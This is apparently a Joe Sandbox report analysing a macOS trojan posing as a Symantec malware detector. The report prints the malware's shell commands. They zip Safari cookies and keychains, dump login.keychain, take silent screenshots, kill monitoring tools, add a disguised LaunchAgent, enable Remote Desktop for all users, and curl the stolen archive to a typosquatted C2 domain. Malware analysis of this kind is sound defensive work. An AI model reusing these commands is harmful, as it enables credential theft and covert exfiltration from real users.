Analysis Report

Overview

General Information

Joe Sandbox Version:	21.0.0
Analysis ID:	46001
Start time:	13:08:42
Joe Sandbox Product:	Cloud
Start date:	21.11.2017
Overall analysis duration:	0h 14m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	BiyuYDBAMc (renamed file extension from none to app)
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.macAPP@0/50@15/0
Warnings:	Show All Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Classification

Signature Overview

Click to jump to signature section

Cryptography:

Creates files with functionality related to DES encryption and/or decryption

Show sources

Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py	Found S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py	Found S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]

Executes the "openssl" command used for crypographic operations

Show sources

Source: /bin/sh (PID: 507)

Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem

Writes files containing public keys to disk

Show sources

Source: /usr/bin/unzip (PID: 502)	File created 'PUBLIC KEY' pattern: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/sh (PID: 506)	File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
Source: /bin/cp (PID: 541)	File created 'PUBLIC KEY' pattern: /Library/.random/xpcd.app/Contents/MacOS/xpc

Networking:

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: script.google.com

Reads from file descriptors related to (network) sockets

Show sources

Source: /sbin/route (PID: 479)	Reads from socket in process: data
Source: /usr/bin/curl (PID: 513)	Reads from socket in process: data
Source: /usr/bin/curl (PID: 516)	Reads from socket in process: data

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443

Writes from file descriptors related to (network) sockets

Show sources

Source: /sbin/route (PID: 479)	Writes from socket in process: data
Source: /usr/bin/curl (PID: 513)	Writes from socket in process: data
Source: /usr/bin/curl (PID: 516)	Writes from socket in process: data

May scan ports using the "nc" (netcat) command

Show sources

Source: /bin/sh (PID: 510)

Netcat executable (-z switch): /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53

Detected non-DNS traffic on DNS port

Show sources

Source: global traffic

TCP traffic: 192.168.0.50:49200 -> 8.8.8.8:53

Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listens

Show sources

Source: /bin/sh (PID: 510)

Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53

Pings several hosts (probably to check C&C connectivity)

Show sources

Source: Ping host arguments

More than 5 different servers pinged: abrahamlincolnisaliveandrunssymantec.com, symeher.co, symantecheurengine.com, kio2349329490jfdkf394.com, symheureng.com, klsadkla93242lokiloki.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Captures screenshots with shell command 'screencapture'

Show sources

Source: /bin/sh (PID: 493)

Screen captured: screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png

Enables system access through Apple's Remote Desktop Sharing for all users

Show sources

Source: /usr/bin/sudo (PID: 551)

Apple Remote Desktop kickstart all users: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

Explicitly creates screenshots silently (i.e. without playing sounds)

Show sources

Source: /bin/sh (PID: 493)

Screencapture executable (-x switch): screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png

Uses kickstart to modify Apple's Remote Desktop settings

Show sources

Source: /usr/bin/sudo (PID: 551)

Apple Remote Desktop kickstart: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.macAPP@0/50@15/0

Data Obfuscation:

Imports the IOKit library (often used to register services)

Show sources

Source: initial sample	Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sample	Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sample	Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Imports the Security library (often used for certificate, key, keychain, or secure transport handling)

Show sources

Source: initial sample	Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sample	Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

App bundle is code signed

Show sources

Source: Submitted file: BiyuYDBAMc.app	CodeResources XML file: CodeResources
Source: Submitted file: BiyuYDBAMc.app	CodeResources XML file: CodeResources

Creates application bundles containing icon files

Show sources

Source: /usr/bin/unzip (PID: 502)	Icon file created: /tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)	Icon file created: /Library/.random/xpcd.app/Contents/Resources/Finder.icns

Executes the "awk" command used to scan for patterns (usually in standard output)

Show sources

Source: /bin/sh (PID: 480)

Awk executable: /usr/bin/awk -> awk /gateway/ { print $2 }

Reads data from the local random generator

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Random device file read: /dev/random
Source: /usr/bin/zip (PID: 485)	Random device file read: /dev/random
Source: /usr/bin/zip (PID: 487)	Random device file read: /dev/random
Source: /usr/sbin/screencapture (PID: 493)	Random device file read: /dev/random
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 507)	Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 513)	Random device file read: /dev/random
Source: /usr/bin/curl (PID: 513)	Random device file read: /dev/random
Source: /usr/bin/curl (PID: 516)	Random device file read: /dev/random
Source: /usr/bin/curl (PID: 516)	Random device file read: /dev/random
Source: /usr/bin/perl5.18 (PID: 551)	Random device file read: /dev/urandom

Uses AppleKeyboardLayouts bundle containing keyboard layouts

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Uses the Python framework

Show sources

Source: /usr/bin/xattr (PID: 503)

Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python

Writes property list (.plist) files to disk

Show sources

Source: /usr/bin/unzip (PID: 502)	XML plist file created: /private/tmp/xpc.app/Contents/Info.plist
Source: /usr/bin/unzip (PID: 502)	Binary plist file created: /private/tmp/xpc.app/Contents/Resources/MainMenu.nib
Source: /bin/cp (PID: 541)	XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Source: /bin/cp (PID: 541)	Binary plist file created: /Library/.random/xpcd.app/Contents/Resources/MainMenu.nib
Source: /bin/sh (PID: 544)	XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Source: /bin/sh (PID: 546)	XML plist file created: /Library/LaunchAgents/com.apple.xpcd.plist

Changes permissions of written Mach-O files

Show sources

Source: /usr/bin/unzip (PID: 502)	Permissions modifiied for written 64-bit Mach-O /private/tmp/xpc.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 541)	Permissions modifiied for written 64-bit Mach-O /Library/.random/xpcd.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx

Checks the current date and time via Internet using a shell command

Show sources

Source: /bin/sh (PID: 513)

HTTP request via command: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec

Creates Python files with suspicious function names

Show sources

Source: /private/tmp/xpc.app/Contents/Resources/pbkdf2.py	Suspicious function name: def xorstr(a, b):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py	Suspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py	Suspicious function name: def decrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py	Suspicious function name: def xorstr(self, x, y):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py	Suspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py	Suspicious function name: def decrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.py	Suspicious function name: def xorstr(a, b):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py	Suspicious function name: def encrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py	Suspicious function name: def decrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py	Suspicious function name: def xorstr(self, x, y):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py	Suspicious function name: def encrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py	Suspicious function name: def decrypt(self, data, pad=''):

Creates application bundles

Show sources

Source: /usr/bin/unzip (PID: 502)	Bundle Info.plist file created: /tmp/xpc.app/Contents/Info.plist
Source: /bin/cp (PID: 541)	Bundle Info.plist file created: /Library/.random/xpcd.app/Contents/Info.plist

Creates hidden files, links and/or directories

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Hidden file created: /tmp/.dio3we/.dat.nosync01dc.lbqoPC
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Hidden file moved: /tmp/.dio3we/.dat.nosync01dc.lbqoPC -> /tmp/.dio3we/.lmx
Source: /bin/mkdir (PID: 481)	Hidden Directory created: /tmp/.dio3we -> /tmp/.dio3we
Source: /usr/sbin/screencapture (PID: 493)	Hidden file created: /tmp/.dio3we/..prelim.png-GB5W
Source: /usr/sbin/screencapture (PID: 493)	Hidden file moved: /tmp/.dio3we/..prelim.png-GB5W -> /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 500)	Hidden file created: /tmp/.sklerfde
Source: /usr/bin/unzip (PID: 502)	Hidden file created: /tmp/xpc.app/Contents/Resources/.checksum
Source: /usr/bin/unzip (PID: 502)	Hidden file created: /tmp/xpc.app/Contents/Resources/.crc32
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Hidden file created: /Library/.cachedir/.dat.nosync01f9.oWo2Oy
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Hidden file moved: /Library/.cachedir/.dat.nosync01f9.oWo2Oy -> /Library/.cachedir/.lmx
Source: /bin/mkdir (PID: 538)	Hidden Directory created: /Library/.cachedir -> /Library/.cachedir
Source: /bin/mkdir (PID: 538)	Hidden Directory created: /Library/.random -> /Library/.random
Source: /bin/cp (PID: 541)	Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.checksum
Source: /bin/cp (PID: 541)	Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.crc32

Executes commands using a shell command-line interpreter

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c route -n get default \| awk '/gateway/ { print $2 }'
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c mkdir /tmp/.dio3we
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/backup_(null).zip /tmp/.dio3we && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c find /tmp/.dio3we -type f -not -name 'backup_(null).zip' -print0 \| xargs -0 rm --
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c screencapture -x /tmp/.dio3we/.prelim.png
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c csrutil status
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c sudo -k
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c echo '' \| sudo -S echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c echo 'vreni<0delim0>' > /tmp/.sklerfde
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Shell command executed: /bin/sh -c unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec\ Malware\ Detector.app/Contents/Resources/sym03_2901.dat && xattr -c /tmp/xpc.app open /tmp/xpc.app
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvceoh2bLtCGhgMM6SHvse8qFPKI4yX/RLAfKSvccClFnV7WQqlqVEZ/xL9/wQ6uSbwEUxwweq9lu8CMSucKR881zSFHBoj2epoHFbJoJmI3Cn8GHLZs+JbDss/kxrtNDTBYXAC6jL0xwPj4zj2LdvuSLvkh25egGmc/M3IXEjBtjSBvjEjWF5/QD0oDfKXs/j6OvurrjSReqxwZFKcOc5RH2hTRj2wu/Kuz7yVFeRrpCusjuVteq8ePFT7UF7QnXgfGvsxMsv3cItmoEJYkz1xcVyfknIlIaqsJrDT0zjn61Vsj9ywB8WeK2g9BSublBZ7PN5jHXdZWudgtrExHvUwIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs7a+wrCidA8Z50sv1ExI0FQFqWATGGNKhY2X4TrHEcp0VrTpNbaL8uYo05LiHpowtPZ4Ej0kTtUbGMt7weQ6dVgtALtkcpMfZqC4ii89sb/PX0tIWnJkj2fPpDbMvj4m6dCim7VSO7rXJm81EO6I+cYXFrDNVdKUNO8doZjP2Fw7y/jJLdowusSb8YAnHNsi2KQ0tlZ0pFQmJWgSQ0QWMtCW1UE6tTK21kxP1u7OP6lKAQsYDO1tWyQw4L/X3YK/3Sy7ZBNE8tCWPKDtd1mxJxwcPJt5bcCjFxhqMXznBGHLdNDJHPq1t0ZBQyrRBUK5VbfcbnoruiMpph6FNaqZ7wIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c ping -c 1 symantecheurengine.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c ping -c 1 symheureng.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c ping -c 1 symeher.co 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c ping -c 1 kio2349329490jfdkf394.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c ping -c 1 klsadkla93242lokiloki.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c ping -c 1 abrahamlincolnisaliveandrunssymantec.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c if [ -f /Library/.cachedir/.ptrun ] then echo success fi
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c cat /tmp/.sklerfde
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c rm -rf /tmp/.sklerfde
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c killall Console killall Wireshark rm -rf grace_period echo '' \| sudo -S mkdir -p /Library/.cachedir /Library/.random && sudo chmod -R 777 /Library/.cachedir /Library/.random && cp -R /tmp/xpc.app /Library/.random/xpcd.app && mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd && sudo sh -c 'echo '<?xml version=\'1.0\' encoding=\'UTF-8\'?><!DOCTYPE plist PUBLIC \'-//Apple//DTD PLIST 1.0//EN\' \'http://www.apple.com/DTDs/PropertyList-1.0.dtd\'><plist version=\'1.0\'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</strin
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c csrutil status
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c route -n get default \| awk '/gateway/ { print $2 }'
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c python /tmp/xpc.app/Contents/Resources/cb.py -f /Users/vreni/Library/Keychains/login.keychain -p 2>/dev/null > /tmp/.kcd && echo 'success'
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/backup_(null).zip /Library/.cachedir && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c find /Library/.cachedir -type f -not -name 'backup_(null).zip' -print0 \| xargs -0 rm --
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c screencapture -x /Library/.cachedir/.prelim.png
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Shell command executed: /bin/sh -c a1511269823=`curl -s -F full_name='vreni' -F admin='1' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Library/.cachedir/backup_(null).zip' -F xml='@/Library/.cachedir/.lmx' -F username='vreni' -F screen='@/Library/.cachedir/.prelim.png' -F ssh_present='0' -F serial-F api_key=57432354a89c4bab15b1c7795507e44d74d21d9500c9d5307a3d71a7949f608b -F cts=1511269823 -F signature=13ba26234ba13dbd86138b9214f0edc304bf9926a7298a58aceeb48bf0270332 https://symantecheurengine.com/api/init` echo $a1511269823
Source: /usr/bin/sudo (PID: 544)	Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>
Source: /usr/bin/sudo (PID: 546)	Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /usr/bin/perl5.18 (PID: 553)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/Users
Source: /usr/bin/perl5.18 (PID: 554)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uid
Source: /usr/bin/perl5.18 (PID: 555)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uid
Source: /usr/bin/perl5.18 (PID: 556)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uid
Source: /usr/bin/perl5.18 (PID: 557)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uid
Source: /usr/bin/perl5.18 (PID: 558)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uid
Source: /usr/bin/perl5.18 (PID: 559)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uid
Source: /usr/bin/perl5.18 (PID: 560)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uid
Source: /usr/bin/perl5.18 (PID: 561)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uid
Source: /usr/bin/perl5.18 (PID: 562)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uid
Source: /usr/bin/perl5.18 (PID: 563)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uid
Source: /usr/bin/perl5.18 (PID: 564)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uid
Source: /usr/bin/perl5.18 (PID: 565)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uid
Source: /usr/bin/perl5.18 (PID: 566)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uid
Source: /usr/bin/perl5.18 (PID: 567)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uid
Source: /usr/bin/perl5.18 (PID: 568)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uid
Source: /usr/bin/perl5.18 (PID: 569)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uid
Source: /usr/bin/perl5.18 (PID: 570)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uid
Source: /usr/bin/perl5.18 (PID: 571)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uid
Source: /usr/bin/perl5.18 (PID: 572)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uid
Source: /usr/bin/perl5.18 (PID: 573)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uid
Source: /usr/bin/perl5.18 (PID: 574)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uid
Source: /usr/bin/perl5.18 (PID: 575)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uid
Source: /usr/bin/perl5.18 (PID: 576)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uid
Source: /usr/bin/perl5.18 (PID: 577)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uid
Source: /usr/bin/perl5.18 (PID: 578)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uid
